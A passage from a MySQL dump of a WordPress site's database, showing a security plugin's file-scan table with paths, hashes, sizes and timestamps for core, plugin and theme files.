/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_permanent_block`
--

LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_files`
--

DROP TABLE IF EXISTS `wp_cerber_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_files` (
  `scan_id` int(10) unsigned NOT NULL,
  `scan_type` int(10) unsigned NOT NULL DEFAULT 1,
  `scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_step` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_name` text NOT NULL,
  `file_type` int(10) unsigned NOT NULL DEFAULT 0,
  `file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `hash_match` int(10) unsigned NOT NULL DEFAULT 0,
  `file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
  `file_perms` int(11) NOT NULL DEFAULT 0,
  `file_writable` int(10) unsigned NOT NULL DEFAULT 0,
  `file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
  `file_ext` varchar(255) NOT NULL DEFAULT '',
  `extra` text NOT NULL,
  PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_files`
--

LOCK TABLES `wp_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp_cerber_files` DISABLE KEYS */;
INSERT INTO `wp_cerber_files` VALUES (1629897503,1,0,0,0,0,'0054c404214c9d2127c978e28e5a002b2cffb3e5','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-ajax-upgrader-skin.php',1,'07b68909f83a726cfd24c02666dbb5480dda5d2657abd46dfff6419a6fad55b7','264cef673db325636e8609127dc7a3e6','',0,3504,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'005f147fc0cc0129929372adf93d1932496f980d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',2,'9c79a68bc7eefa0d5c0636eb938cdb00cfd4279748f51e1ccbcbff1c6a7239c7','189f6f199086fe683583880d78dc964e','',0,2399,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'008e174fd166d8f7dc89c03b0fd1c0deaf7f5e9b','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/HTTP/Parser.php',1,'b713dda2f340ffe3e3cd287490b7c767eda00db20ffefe3eb20ca69c9b382704','3a70e3030fc76414271b1ff724db2f0c','',0,11515,33188,1,1624521003,'',''),(1629897503,1,0,0,0,0,'009fff987eda28568bb998a6f3be78825ca44c0e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',2,'6542595b1506fb939f421dd175b16984f9323c81f8722a90c90b971729959b30','a6c50a1c416776fa983103500c83d8b5','',0,9662,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'00a46d1f291764d7de682562dc0ecb49040604cb','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'40bebffaeb26c1862a0ca53c4e254fb831333fc28d3fa0df11bb8e4863c27a91','310db8011ae5b959e2dcb56d609092f2','',0,10097,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'00ab0f2cf4bebd9ec3e2e1370359f4dc927c03bf','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Proxy.php',1,'01a8d1d4f62fbe5efba952f9697d85dd6e27fc5f423f9687431934206164b599','b5406b1037b500d7d374b85c2a879947','',0,813,33188,1,1624521003,'',''),(1629897503,1,0,0,0,0,'00b6556aac75fc3d7ea72ade44c22799a330a357','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',2,'005f405fdd062ab4c0081e76ff4f3efca80b89b984dc0c3c2d1b94c17abdbe95','cd7aa73833d03f77cce9db02e6b1dc57','',0,4311,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'00c3fcf55b43015e34f5b47b239037bb1e430988','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/base-data.php',2,'07d5fa969c3872936b38a804fa8ab3fb00e85ae6674cd662aa4d938023fb98ac','b2a9d285deefce9bb218a35c29022d2a','',0,3541,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'00eb7e62be47175059610c8d95f2b8ee275d43b7','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-recovery-mode-link-service.php',1,'360a59dae972cb054f6f15824f19af706caf23751801d4a4f8949d9e82348df4','9ebed51b7fc0e57d06662f63cd6e7835','',0,3401,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'011699c71024dd1a75b509f86891b0fca6767560','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',2,'8a62aff03b6a79c2ce9b17801041f7cf4e7762fc3fadabc2506401bf18920b69','f8d78b07bf506fcb1976b79460ad0207','',0,7968,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'013965c492f3668503c0d25549e0309fa7b395aa','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/blocking/country-modal.php',2,'e97c630c16fe3c7c0b5ba54e06a7ba4e5c057d36d9e34af2fc23d7af3e4b97bd','eecb7aca3132d53bb06ad03484467c1b','',0,2867,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'015254f2ff7cfadeffafd48364b04957f9113bd8','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/log-reporter.php',2,'08a90be6ef5b48196755cb4add917e33b286f34d384db1e7207731bae7b7c394','213f36040383979d8ae94be3a47b4c2d','',0,2936,33188,1,1627570491,'',''),(1629897503,1,0,0,0,0,'01621e3c055c63c58c4a5f808da57246751e6cf7','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/searchform.php',3,'acf62be35ed54a60dc96051c7a833f45cb09dec23468f5f2a2cb7cc20eeb776f','e66764fb77c2f6fd8a7dbf242765c00c','',0,1432,33188,1,1619440190,'',''),(1629897503,1,0,0,0,0,'0162dff6ba707325d504bfe71449a469e7ae8e22','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',2,'e3a0f254662bb655f1f1ee8583a283a57e2b1e7842238355907baa61cd77c02e','be6de2545e1c7a075b22ece01a6f8b83','',0,7924,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'0165d75808abccd531f68644761b359730c3fcc6','/home/westonspirit.org.uk/public_html/wp-admin/includes/translation-install.php',1,'5d6641e7ccf22dddee8f3dd2af7fca01cbc9dc701b1513d2b1ae15a2cad6db6e','213e44dc676c4d05e8be3c836d671ccc','',0,8870,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'0180dfe076e1e7bacb94d4ed4f29fc98d7098a8e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/frontend.php',2,'843b94b4f055553571fe8803dec25e0bba8a5ea804f5bfb674733ef629abae05','ddb910658c50c1df2eb70c71088df152','',0,36286,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'01a970805b52bb433850749ada72e5f0dade58f0','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/inc/settings-display.php',2,'d145c6a266111c91d2b0900d1e57cd8f425f14790fd98fa5b833f9e47515026a','4a740ad1e7f68c1c28810de5f99d2b5c','',0,815,33188,1,1626250895,'',''),(1629897503,1,0,0,0,0,'01cae380531f60de8d86993569741d62e88b427a','/home/westonspirit.org.uk/public_html/wp-admin/network/update.php',1,'0f60541cb4dd19dec07163d56c0c7073bcdbff72d22c327cb85e406996885a0b','6c9dc7fb09ce9252553be27070c6629d','',0,450,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'01e9b22758c49fcb047ddf9f907ae90319bbef7a','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/511.php',1,'63d057555761322386c1efa86469983b50fc000599beb67dc9395c713f029e98','03756e9a4e3c4b77f8d09bb9918fd140','',0,535,33188,1,1624521003,'',''),(1629897503,1,0,0,0,0,'01f1f7ede9d631a82c7e7543e0f8bec9101d968a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',2,'3b7da999ecd722c2a35670dab3da93bc7a193f8ac840a46f1da376b6289a8804','99708b98d48fa66430c4e06c4e26372b','',0,268,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'01f4418568cdeff25e07df03b7944aaa84456f17','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/core.php',3,'6c1650712b6c7a6839abeac9993b19a844b0b84d63689c188c4a20d350a4ba7b','60cb5e0390acc756edcbac4ea37b6e9d','',0,10222,33188,1,1629806208,'',''),(1629897503,1,0,0,0,0,'02100a323ae54a7d33cda2baff5a1619443822ea','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',2,'1add48bb2debddfe3d0eaa6ebd94aab127fcc1be27a9e9ec64c588e6b89f4337','d2163b49ccf655608e9574e0f590fcb0','',0,6270,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'0234d4870694dbae35fb4404d675d662c5afbb41','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/inc/block-patterns.php',3,'363a4fb4bd72f36d6f144c0e042a54f52f3b5155cea7e7122de72ceaef308ae4','2cf56cfb97ead1bc0907262edb0b81e6','',0,9925,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'0236ff69e543161f5941875f563d8be3dc2ac3fc','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block-parser.php',1,'12c2c559017b379692e90c430c752328c73211cc7d4d1a731b95d1d115c32094','25ea7d0bf6438b316747722ade20e737','',0,15218,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'02450dd2538fb13558570591d90fb7abe8d86262','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/page-assets/loader.php',2,'f8f45d92a120376baccae0506ce133e21ac2f9020c70cb888285625250c16e75','f0dce492d65858ea48d4bd9c1e432cd8','',0,2918,33188,1,1627570491,'',''),(1629897503,1,0,0,0,0,'0256b11dbd48e222ec99b59f4fd7726c2f9c0b55','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/log/log.php',2,'dc66aa591a088bf64b3d0bb4e7612db55122adc7d5b93ce68bb055108f22836c','8d2d71da748f8238cbb5fa32fb113601','',0,12020,33188,1,1627642682,'',''),(1629897503,1,0,0,0,0,'0279a6e0a1c9a36651efe0ad4ba2120de6b03e08','/home/westonspirit.org.uk/public_html/wp-admin/network/admin.php',1,'06624070a3774e3d93477c324cccb6521958d25b949480f8fc7122d3883136ec','7fcfae0d8cfd265a33927293220417f2','',0,1024,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'027f0f709598773283a06ab171a185083da35986','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/section-title.php',2,'482c18ebcc4592370571138c966c537bf2125d469baa893e7d227c670daf73f7','a20883775db151a856f7d5b4691e13ab','',0,1235,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'02c2e5f879f93b2264cd7a8b1f67094898423577','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/theme-style-images.php',2,'5a67a5389acaa29ef252c2b1abb1834ca627869b051c8bf4c63a77325eb319a2','c59ba5d01bc2b1907936e5629a1cb792','',0,4486,33188,1,1627570491,'',''),(1629897503,1,0,0,0,0,'02da9604bd6edf5ec3496d036c3036543db090e9','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/switcher.php',2,'961e001ec17a2024b7972fd4bae1dc3a58bba7063c32d276c6d6b345718d496d','bd536af855583ebd172ab6a033fc7283','',0,2135,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'02e7028c6f1da124ebffbfbc6edf22ae99fa716d','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-ftp-sockets.php',1,'d72226bb03498c4a1c1694ad31e3318918208d4a6281ead864d6ef06700f9ce0','0c51d522509ebca6931f653cfaf93369','',0,8475,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'02f4ef88da5cdb99323b9ee63851e4f1eefbd0a1','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/large-header.php',1,'af046525efdf0abfd3a4c6dc5c87e857d674754ceae3fd9d9c7d838e2a3fa9ee','f56096ec7f8033eaef00f35d6a363f3e','',0,1322,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'02f78e108e6a8d3ccc2544fd78a1ad8ce06673fa','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/page.php',3,'931466f9ac64a1a1b8a637bd4b7c8e828275e79494eec383f9144d7356dfb30f','8b7c98e1cc7572f5b25df6197298bfb6','',0,1261,33188,1,1629806208,'',''),(1629897503,1,0,0,0,0,'03121ef8eb3fa309204cb5bf36df3e99211d6f11','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/settings/controls.php',2,'1274dc356bb6bd0368880ab5cd46f0f93f2187a559583909e6b76273ca702585','56fff8406058e2992ec211bcfc43b58a','',0,6920,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'032b9034b5cf0e9a83abeb3e4bbd34b2d9c41f83','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/.htaccess',2,'7e5fdead9a7a1043c50d689fb5794e0a6e831c772f9e1781d96796e4e758a9e4','a34522784bcaea0e7bc738f6645312b3','',0,354,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'034af6239d63b915d3c5a50ec981438649d1fa6b','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'2bf0a13dd17884e9ab262ac004f6f940358d27fcbeff492789e6280ff5970853','93f701bb01e99676df0d732a935c810e','',0,5207,33188,1,1624521007,'',''),(1629897503,1,0,0,0,0,'0352dc31a3d5dc45478c18f90fa8f048f821af13','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',2,'99022cc327a9d1b7f1083344b10f840e11603a9701bd0ca99149d8d1e76ec198','282468ac63a5a7f87f31c06880ed0b14','',0,3329,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'03703d296576b710a824feeb51f1e5be0dc45a0c','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-upgrader.php',1,'15167080c2cdde534b38ff1889638325b126b9716b433aeb7bfdf71987e36360','86bd50013d9226868a5cd3dc2ee75f49','',0,36583,33188,1,1624521018,'',''),(1629897503,1,0,0,0,0,'038763ac0d69f4ce9cb7efa1c018f8f7a4571080','/home/westonspirit.org.uk/public_html/wp-content/themes/index.php',3,'bd48c24ce4500e60d2524571756787283f0d3fbfa50b116331309c09773f0cd1','67442c5615eba73d105c0715c6620850','',0,28,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'038778f53f266e75e8c7143c552fd52b24ed22c3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/assets/svg/svg-handler.php',2,'cdcc3982f292194cd74ef5261f58aac14d11b174dd1b3ff33278f93d8ce5784a','c385376af90409dd0c4bd8c8a0a69ef2','',0,16083,33188,1,1627570491,'',''),(1629897503,1,0,0,0,0,'03b1ade8e48cf71e7cd0bb41a139ff60541d82a0','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',2,'75b314b688529bcc7fbcfbe6218f25fcb490597049f592eb2ffbe9c1f241c464','52a5b6cae5cda19a02524930a919fc5b','',0,45250,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'03b245afed66415852d8ff8e675857fad2e2ce2a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/system-info/reporters/network-plugins.php',2,'b9aebf2b9b7315af271434727d9442afab9f3aea3bc159f72e745cda5d263ce6','63d77628658c5ac05f530f4608df6ef9','',0,2228,33188,1,1627570494,'',''),(1629897503,1,0,0,0,0,'03bdcf483f3560e2cdc570d78ef6262e9a446180','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block-pattern-categories-registry.php',1,'588afd349bc77d685bb05d9aa3dbd29efb734cf1b01276a79ff8141881f11b17','a854d9dff669bab6f2e8a9bf2f1b9821','',0,4209,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'03e05318c3e704cdc5ba9836a94cc8f698c09ba3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/dev-tools/deprecation.php',2,'78f25568677856af03c34b6e946ce6b05ff612f05b623c2883352d7750718682','7b4680020bb5f07bd01f92341bb8c237','',0,8763,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'03e4bda726c074b73cbd69713124299ce0ef6c25','/home/westonspirit.org.uk/public_html/wp-includes/meta.php',1,'4d31f76602ddba40b5d46830583314ff1b5c8776d1c505da1a8b6c48265e6294','8836799513bd77eb14bdd44eeed1880c','',0,59597,33188,1,1624520999,'',''),(1629897503,1,0,0,0,0,'03f4c3b2a92f8960fafa54394119b77e6ded75b0','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/utils.php',2,'df3ac0f361ea57e96791a0c4de84a7afc7341cbc64b350811f5ce4afab6eaa8c','58415007027870ac1d5f3fd60fe2d207','',0,17693,33188,1,1627570492,'',''),(1629897503,1,0,0,0,0,'0400d993a644bff3e108c0abd6f13b40a23a4494','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/elements-iteration-actions/assets.php',2,'85e578ab9b21c662f618e5b8e9d387ffbfab49a346e5c95f0eee7e2f0be93f0f','8456f06f86829346f30622c212b31798','',0,5166,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'0410985b0b6b41db4e5b55b8f6e1c56d09060cb9','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-comment.php',1,'dab32cbc2f1c3eba4cb2df507def4775477a0771b4396d025ba597db89c687d3','4a07306e824e142ea1f879c6aa62f9da','',0,9321,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'0439ad870b75f735ff99727552dcb2b90f1f2e2d','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php',2,'1a527f928195f5dfe33bdd10b82b767bf10efe271c7a8a1d857642af607b82b8','471ddd903399b8de7d27664792bae37f','',0,4122,33188,1,1625053880,'',''),(1629897503,1,0,0,0,0,'045a1b0c42157b087b512a758c0362f4d0db8e8a','/home/westonspirit.org.uk/public_html/wp-admin/menu.php',1,'c673a3e5a659b5df909d5a7624aa428bc7f6413348ee2220fec206b6eac04657','7812d1eb8908169688940df45d40f8c8','',0,14530,33188,1,1624521013,'',''),(1629897503,1,0,0,0,0,'04660ae332c78f818e499e579ae2a60c4eff215f','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/redirection-strings.php',2,'8d718dc0087704661661599561a0fafd7e8dfb8e1c3109294ce371827aea4cc7','04ef12772d3357cc285feb41dbe56648','',0,78456,33188,1,1627642680,'',''),(1629897503,1,0,0,0,0,'049bd3f53e0a57609181fbaa7835b1dbf5822e95','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',2,'e7e961cfcd4d0deceae60638b644644313471bf5b0efdc95ce2f61175c661920','4a375ea49810d19a124f19e90c9df569','',0,1839,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'04d9e5e6c11eabdff7d117a4ed10ae4a1b5e3c91','/home/westonspirit.org.uk/public_html/wp-admin/plugin-editor.php',1,'ef3645ffb6b92341e77365f8ff883c9cc364e81ff1858decccdeb0e78f441c82','24d144c1c1d5777fb06fede3a97db144','',0,13332,33188,1,1624521014,'',''),(1629897503,1,0,0,0,0,'04e248e142a1d979de3ec85b16753668df557e19','/home/westonspirit.org.uk/public_html/wp-admin/includes/misc.php',1,'6800c1153567596b7ee7cc7dd438fd0b3099b69a686fb1f4fa2e2fa9b038c100','45c3dde98abb7e468815613855af2776','',0,44002,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'04f6b3cdf363cc1075eb1aa275877b5fc8dd76df','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',2,'81475233aeda15b5b48929bc7e9c2603780fba4b41b7f2668db9a36ab7016256','7d8ec4613250a582f04b51b08269221f','',0,2794,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'051b4600b70962d9b2eb9915735d84ec209e032e','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-background-position-control.php',1,'32318f3731033a229a4bae80f1055a7bdeac8aa93132ebd66ec6c415c6045228','bf514a74221e18b8c22121845fe75e09','',0,2951,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'051cdde5635e2e1b4c11e0221174ff4b55f44e6a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/sidebar.php',2,'a25dc866f1a23ba213601fb7ed33b07218ca9174a01195cdef55d4e130cd16d0','353d47fbd1edbddc9afa2eb98cc14ec6','',0,2925,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'0570cd9f3306335bbb71606d7d1b3a760c7cefa8','/home/westonspirit.org.uk/public_html/wp-admin/includes/plugin-install.php',1,'1593b027047227b3ace60109d47f96e5ecc24013a9f2768227c115c149db993e','b48a9c4cbdf9890bc0539f301d93c5c4','',0,34539,33188,1,1624521017,'',''),(1629897503,1,0,0,0,0,'05afa1b1c9a442cd589239d15097eee0c978e587','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/inc/custom-css.php',3,'2dce2cdff82bcd499e6bd22766d053b555d6c1c15b7559b58445aadf6101d511','4bc09911e5903cbafbdac89db2b9ae61','',0,9228,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'05ca4dfb717f6be50c8268cf19eeb18e19452ce1','/home/westonspirit.org.uk/public_html/wp-content/index.php',1,'bd48c24ce4500e60d2524571756787283f0d3fbfa50b116331309c09773f0cd1','67442c5615eba73d105c0715c6620850','',0,28,33188,1,1619440188,'',''),(1629897503,1,0,0,0,0,'05d737b015686af59ee1c8e8581c68eb344a9b10','/home/westonspirit.org.uk/public_html/wp-content/plugins/index.php',2,'bd48c24ce4500e60d2524571756787283f0d3fbfa50b116331309c09773f0cd1','67442c5615eba73d105c0715c6620850','',0,28,33188,1,1513886421,'',''),(1629897503,1,0,0,0,0,'0607aabcec64179b3e8dee64e084b64f4e839049','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/quote.php',1,'1e0af4e3bb17fead0b7e8f13412400dc30906a954edc2c6b3e168cffef6562e4','63c23acb762c5e385e87bda3f022d37d','',0,1377,33188,1,1624521008,'',''),(1629897503,1,0,0,0,0,'0615c7a7b292e4587f7cd6a58cd1a04017a3de62','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/ajax/module.php',2,'bea6cda8941828b1f1aad5ffc43eed77c03a25af7ddccabd12658af429e04c76','68fab4ee1b9417463119c05e97580e8d','',0,6965,33188,1,1627570490,'',''),(1629897503,1,0,0,0,0,'063ab7ff0686ffad90ac306fd8706ac683c08dd4','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/header/entry-header.php',3,'8078c5253a2e461db80019cba0b95c06f97bb6a26018d2cb2d48db174d831900','54e0f245a206353051f7c2443d946cb4','',0,183,33188,1,1619440191,'',''),(1629897503,1,0,0,0,0,'066d488903999fbb3a159efe66d82b3996c01a70','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-request.php',2,'64a69bb2774afa7f3c8bcbc11f80bcff2525c7610c783711ac3a679c0c8a7502','d0780b66edda92cffe6b9744691bf992','',0,7980,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'06916e7fb8b7efd715a00a1c7175f99da372570a','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio-video.quicktime.php',1,'a93d4f4491b25fd0ff225c00357dc8271b10acf68570e00ec70285f1f7556bd3','dfd590a5fb25fb0ff3f3332f19b47f2a','',0,164611,33188,1,1624521005,'',''),(1629897503,1,0,0,0,0,'06b936ccf56c531b6438e04ff33fdbce826cd0d5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/image.php',2,'47c0ac11b0313ac7274744f4f610003a9c0d1ba88c32a9a3ce28bfedd1b337f0','643cb54e55e187ae88115b0503e34c0e','',0,18264,33188,1,1627570493,'',''),(1629897503,1,0,0,0,0,'06cbb9976fb6d5f87d6007d9bcad325357eb5505','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/models/block/wfRateLimit.php',2,'1527fcf10e54eb858a63ca147a6bf839f1419481319e1c3b44d40cd1b0bdd375','b8c02431e244802777b3ac196d80bd83','',0,7854,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'06fb44f1379c44c2b00f412d68528441f3a3efc5','/home/westonspirit.org.uk/public_html/wp-includes/Text/Diff/Engine/native.php',1,'dd3b7eb3f5428d5698b7e2535f2bc073aaabc17d7f3cda93915c466b4333fae4','af53f6d50c16840d93189e01247fd454','',0,15888,33188,1,1624521004,'',''),(1629897503,1,0,0,0,0,'070279c2cc1c457c465e92720ee784463b1fad68','/home/westonspirit.org.uk/public_html/wp-includes/random_compat/random_bytes_libsodium.php',1,'6e57ae0ce42c3d562f60c2552155fe976c2333b3a3e178c506b9de67c909ac0b','349190eee5edbbdfd58fb3e5640617df','',0,2836,33188,1,1624521013,'',''),(1629897503,1,0,0,0,0,'073652cf2239b6d7614e6f5c8f90e15dba31020a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',2,'b78f20b095197d365f96d20119c7f02c1b24f859702d68c627155e10b0c35530','0a3c54667785e75903c05f4915a8f2e0','',0,4550,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'07913c4ca62a0b546462491fb12f619860805002','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Decode/HTML/Entities.php',1,'cd0f2e277419a868f7f66c3dfd844d30ec27d7b8bd7f5ff9d1a84f65f0b284f5','89996ad18b70267980c511b7d6e9ec55','',0,17241,33188,1,1624521002,'',''),(1629897503,1,0,0,0,0,'07b922f22715e05a641aadc285f3055334ba7155','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',2,'5ca91da201f619a311f54d41aa333c98b6d033d8b4769f9691d51c78f5a91f62','9cda840b9d0aba3110b768cdbe2102dc','',0,1001,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'07c62fd023a125e77da72b41f20aa69b495a5e46','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-meta-query.php',1,'79b48828ec85601b638c54364c6ed2edde62816367fbf26df574ea96a8e4ab0b','4bf20cb04392dccc9a7b12224870933d','',0,27840,33188,1,1624521000,'',''),(1629897503,1,0,0,0,0,'07f571b939fe5570ce0bf24faa7674ef111eeb52','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/reports/activity-report.php',2,'5f2b73379b2b74161e68ee20e6d8e6d6e3b5fc75d56018475b2de0af9383df16','d20e8e3f7565d3067744953a9eac45ee','',0,7576,33188,1,1625053897,'',''),(1629897503,1,0,0,0,0,'07f72a02d1c06056019873c5393ad9ea28000874','/home/westonspirit.org.uk/public_html/wp-includes/block-supports/generated-classname.php',1,'7e0f960387c0bae46fb44b4c05a21a7b721545e9644710562df8ecc9bea5b036','66096fbddc49315ae5104e7d76aa1d2d','',0,1940,33188,1,1624521002,'',''),(1629897503,1,0,0,0,0,'081d7a1f8781418577256c7328bb6162ddde7ab1','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/cerber-load.php',2,'059e5ac7edce0fe298435347fdadda4ee3d3502ff9a44235a9307aa53569a156','9f9afb96e8d27531eddc3b0921c9a5ce','',0,216922,33188,1,1625053873,'',''),(1629897503,1,0,0,0,0,'0877cbae75a431b73a00382dc3b24f233092b664','/home/westonspirit.org.uk/public_html/wp-includes/pomo/streams.php',1,'685463c55aba82b083ed2c52d6c2997330945f721129582c7826d5a1d5fe0d3e','c18094b10bda70ef35794e2ed30b9c26','',0,7547,33188,1,1624521006,'',''),(1629897503,1,0,0,0,0,'087d96b21f8a7e01d0ec4d7919ef3ba10e297b95','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/404.php',3,'660aa0a960bf9d0e56bdb807e9157352bd161f8357c156975c1a4bc61f49b7d4','7e066766444191e14beae02eb1c84d13','',0,820,33188,1,1619440189,'',''),(1629897503,1,0,0,0,0,'089acc6d617d7b0e052347775016dbc3e28c7817','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/comments.php',3,'5f3de769f660088af5b405ce0c0561f55cc70777a77a3228a91b7da2100d4f28','07cbce08c6c6841be62638fea3c8c4fc','',0,3216,33188,1,1619440189,'',''),(1629897503,1,0,0,